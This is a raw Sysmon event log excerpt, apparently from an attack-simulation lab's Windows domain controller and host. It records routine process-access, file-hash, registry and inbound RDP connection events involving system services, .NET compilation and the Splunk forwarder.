14:57:59.936{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-D40D-00000000BB01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050458Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.619{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1500-00000000BB01}1176C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.920{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.920{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000050457Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.619{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1500-00000000BB01}1176C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050456Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.619{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1500-00000000BB01}1176C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050455Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.353{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F26789E492BC62D33CD08555030EB46E,SHA256=2646C47574F0814952019EA3271803305F5BA61EBD8F9172871D6EF9DD22EFA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050454Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.741{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56129-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000050453Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBF8-607E-EF06-00000000BB01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050452Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050451Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050450Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050449Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050448Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050447Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050446Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050445Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050444Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050443Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EBF8-607E-EF06-00000000BB01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050442Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBF8-607E-EF06-00000000BB01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050441Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.166{85C0FFC9-EBF8-607E-EF06-00000000BB01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050440Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:00.135{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C36FD170ED7E3A80F20C9AA0286C3339,SHA256=414F657FFBB618208F9E9C7BB5E5628A0B25BABFA83024CA848DC94CF2F8F799,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000077004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.982{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-F60D-00000000BB01}1320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.982{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF9-607E-F60D-00000000BB01}1320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000077002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.951{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\General Logging\TypeDWORD (0x00000002) 13241300x800000000000000077001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.951{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\General Logging\IsolationDWORD (0x00000000) 13241300x800000000000000077000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:01.951{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\General Logging\OwningPublisher{f50d9315-e17e-43c1-8370-3edf6cc057be} 10341000x800000000000000076999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.936{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-F50D-00000000BB01}7080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.920{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-F50D-00000000BB01}7080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 